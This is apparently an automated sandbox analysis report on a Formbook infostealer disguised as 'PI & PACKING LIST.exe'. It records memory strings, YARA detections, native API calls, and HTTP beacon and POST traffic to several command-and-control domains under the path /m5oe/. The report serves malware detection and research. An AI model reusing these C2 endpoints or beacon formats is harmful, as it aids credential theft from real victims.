Source: PI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: PI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.como
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 71M40-2OQ.13.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 71M40-2OQ.13.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 71M40-2OQ.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 71M40-2OQ.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: control.exe, 0000000D.00000002.517422506.0000000005BFE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.cpitherapy.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.cpitherapy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cpitherapy.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: l48xI=HfFUuYfGoA687_s4MlgHxOB4lZ0Nm7jrK4qJHE6cx4G3iKdREpDT(xPofalWauCoOXHBei7HE60gDNAm1Nx2Xa4ccdw3CdHawoT5CGzZQxVI8Fq_4vlWmb56mqHltpfmiXr6V1pkMAHwOpoQoacar3wjJdJVA32ZG2gkoo4ILi(I72CEZw).
Source: unknown DNS traffic detected: queries for: www.gebouwpas.online
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.zkjk888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.cpitherapy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.p-soils.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.bengalindex.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.nu2uresale.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Source: Yara match File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.353618597.0000000000C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: PI & PACKING LIST.exe PID: 2352, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 5228, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: PI & PACKING LIST.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.353618597.0000000000C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: PI & PACKING LIST.exe PID: 2352, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 5228, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: String function: 0123B150 appears 136 times
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01279910
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012799A0 NtCreateSection,LdrInitializeThunk, 2_2_012799A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01279860
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279840 NtDelayExecution,LdrInitializeThunk, 2_2_01279840
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012798F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_012798F0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279A20 NtResumeThread,LdrInitializeThunk, 2_2_01279A20
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01279A00
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279A50 NtCreateFile,LdrInitializeThunk, 2_2_01279A50
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279540 NtReadFile,LdrInitializeThunk, 2_2_01279540
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012795D0 NtClose,LdrInitializeThunk, 2_2_012795D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279710 NtQueryInformationToken,LdrInitializeThunk, 2_2_01279710
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012797A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_012797A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279780 NtMapViewOfSection,LdrInitializeThunk, 2_2_01279780
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279FE0 NtCreateMutant,LdrInitializeThunk, 2_2_01279FE0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01279660
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012796E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_012796E0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279950 NtQueueApcThread, 2_2_01279950
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012799D0 NtCreateProcessEx, 2_2_012799D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279820 NtEnumerateKey, 2_2_01279820
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127B040 NtSuspendThread, 2_2_0127B040
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012798A0 NtWriteVirtualMemory, 2_2_012798A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279B00 NtSetValueKey, 2_2_01279B00
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127A3B0 NtGetContextThread, 2_2_0127A3B0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279A10 NtQuerySection, 2_2_01279A10
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279A80 NtOpenDirectoryObject, 2_2_01279A80
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279520 NtWaitForSingleObject, 2_2_01279520
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127AD30 NtSetContextThread, 2_2_0127AD30
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279560 NtWriteFile, 2_2_01279560
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012795F0 NtQueryInformationFile, 2_2_012795F0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279730 NtQueryVirtualMemory, 2_2_01279730
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127A710 NtOpenProcessToken, 2_2_0127A710
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279760 NtOpenProcess, 2_2_01279760
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127A770 NtOpenThread, 2_2_0127A770
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279770 NtSetInformationFile, 2_2_01279770
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279610 NtEnumerateValueKey, 2_2_01279610
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279670 NtQueryInformationProcess, 2_2_01279670
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279650 NtQueryValueKey, 2_2_01279650
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012796D0 NtCreateKey, 2_2_012796D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041E007 NtClose, 2_2_0041E007
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041E0B7 NtAllocateVirtualMemory, 2_2_0041E0B7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004012AA NtProtectVirtualMemory, 2_2_004012AA
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041DED7 NtCreateFile, 2_2_0041DED7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041DF87 NtReadFile, 2_2_0041DF87
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041E001 NtClose, 2_2_0041E001
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041E0B3 NtAllocateVirtualMemory, 2_2_0041E0B3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004014E9 NtProtectVirtualMemory, 2_2_004014E9
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041DE93 NtCreateFile, 2_2_0041DE93
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041DF81 NtReadFile, 2_2_0041DF81
Source: PI & PACKING LIST.exe, 00000000.00000002.279173554.0000000006E90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCollins.dll8 vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe, 00000000.00000000.240444204.00000000001CE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesZHy.exe: vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe, 00000002.00000002.355397019.000000000132F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe, 00000002.00000003.259681724.0000000000FF4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
